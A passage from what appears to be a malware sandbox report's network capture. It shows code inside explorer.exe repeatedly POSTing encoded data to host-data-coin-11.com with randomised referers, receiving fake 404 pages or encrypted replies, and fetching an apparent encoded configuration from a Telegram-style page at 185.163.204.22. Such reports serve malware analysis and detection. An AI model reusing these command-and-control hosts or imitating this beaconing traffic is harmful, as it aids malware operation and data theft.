                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:56 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  56192.168.2.5498655.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:56.846668005 CET17958OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://coduhchcur.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 142
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:56.977396011 CET17959INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:56 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  57192.168.2.5498665.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:57.106729031 CET17960OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://mtdkhr.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 360
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:57.231446981 CET17961INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:57 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  58192.168.2.5498675.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:57.333708048 CET17962OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pnnppkk.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 207
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:57.457434893 CET17963INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:57 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 1fI:82OI%70


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  59192.168.2.5498705.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:58.060039043 CET17979OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://vjmey.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 233
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:58.175313950 CET17980INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:58 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 b4 a4 8e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 1eI:82OI%0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  6192.168.2.549882144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  60192.168.2.5498725.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:58.752789021 CET17997OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://nkcbokwpr.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 144
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:58.870079994 CET17997INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:58 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 30I:82OTevg]fdP0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  61192.168.2.5498745.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:38:59.179368019 CET18004OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://qphatsqfxk.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 346
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:38:59.297416925 CET18004INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:59 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 94 49 01 7f 05 f1 b4 89 a1 bd 1e b6 10 da 2c b9 53 4b db 12 e1 a4 2a ef 24 41 1b b2 ed 93 5a fd 0d 86 13 82 bd 38 87 22 ed ae 8d 58 7a e2 b2 4c 29 f4 bd e3 3d a1 c8 bc 5b ab 21 96 c4 33 43 5f 6c 0c 4c 8e f2 3d e3 fe 07 c3 b2 d9 5d 91 60 9d d2 69 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 66I:82OI,SK*$AZ8"XzL)=[!3C_lL=]`i0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  62192.168.2.5498775.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:03.392499924 CET18761OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://psstrgiysi.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 121
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:39:03.506782055 CET18762INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:03 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  63192.168.2.5498785.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:03.687156916 CET18763OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://teodgt.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 216
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:39:03.819205046 CET18764INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:03 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  64192.168.2.5498795.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:03.915714025 CET18764OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://bjmss.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 351
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:39:04.037790060 CET18766INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:04 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  65192.168.2.5498805.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:04.137219906 CET18766OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ymhmsmhwi.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 181
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:39:04.255814075 CET18767INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:04 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  66192.168.2.5498815.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:04.352582932 CET18768OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://gqyls.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 308
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:39:04.477022886 CET18768INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:04 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 33 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 53 5e 98 3d a0 e4 66 b1 7b 1b 1b a4 fc 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 31I:82OTevS^=f{0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  67192.168.2.549883185.163.204.2280
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:05.692315102 CET19390OUTGET /capibar HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                  Host: 185.163.204.22
                                                                                                                                  Jan 11, 2022 23:39:05.825078011 CET19391INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:05 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Set-Cookie: stel_ssid=9e5cd89543a5c24778_7768307199201638964; expires=Wed, 12 Jan 2022 22:39:05 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Cache-control: no-store
                                                                                                                                  Strict-Transport-Security: max-age=35768000
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Data Raw: 31 31 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 63 61 70 69 62 61 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 6f 63 6b 79 6d 61 72 63 69 61 6e 6f 31 32 33 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 35 38 65 38 33 39 50 71 68 6f 76 2f 67 4a 2f 4e 43 46 31 69 45 76 64 4f 59 62 33 64 48 4d 47 53 57 63 64 2d 76 39 32 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 6f 63 6b 79 6d 61 72 63 69 61 6e 6f 31 32 33 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 54 65 6c 65 67 72 61 6d 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 69 6f 73 3a 61 70 70 5f 73 74 6f 72 65 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 36 38 36 34 34 39 38 30 37 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 69 6f 73 3a 61 70 70 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 20 4d 65 73 73 65 6e 67 65 72 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 69 6f 73 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 74 67 3a 2f 2f 72 65 73 6f 6c 76 65 3f 64 6f 6d 61 69 6e 3d 63 61 70 69 62 61 72 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 61 6c 3a 61 6e 64 72 6f 69 64 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 74 67 3a 2f 2f 72 65 73 6f 6c 76 65 3f 64 6f 6d 61 69 6e 3d 63 61 70 69 62 61 72 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                                                                  Data Ascii: 118a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @capibar</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="rockymarciano123"><meta property="og:image" content="https://telegram.org/img/t_logo.png"><meta property="og:site_name" content="Telegram"><meta property="og:description" content="58e839Pqhov/gJ/NCF1iEvdOYb3dHMGSWcd-v92"><meta property="twitter:title" content="rockymarciano123"><meta property="twitter:image" content="https://telegram.org/img/t_logo.png"><meta property="twitter:site" content="@Telegram"><meta property="al:ios:app_store_id" content="686449807"><meta property="al:ios:app_name" content="Telegram Messenger"><meta property="al:ios:url" content="tg://resolve?domain=capibar"><meta property="al:android:url" content="tg://resolve?domain=capibar"><meta proper


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  68192.168.2.549884185.163.204.2480
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:05.913913012 CET19395OUTPOST / HTTP/1.1
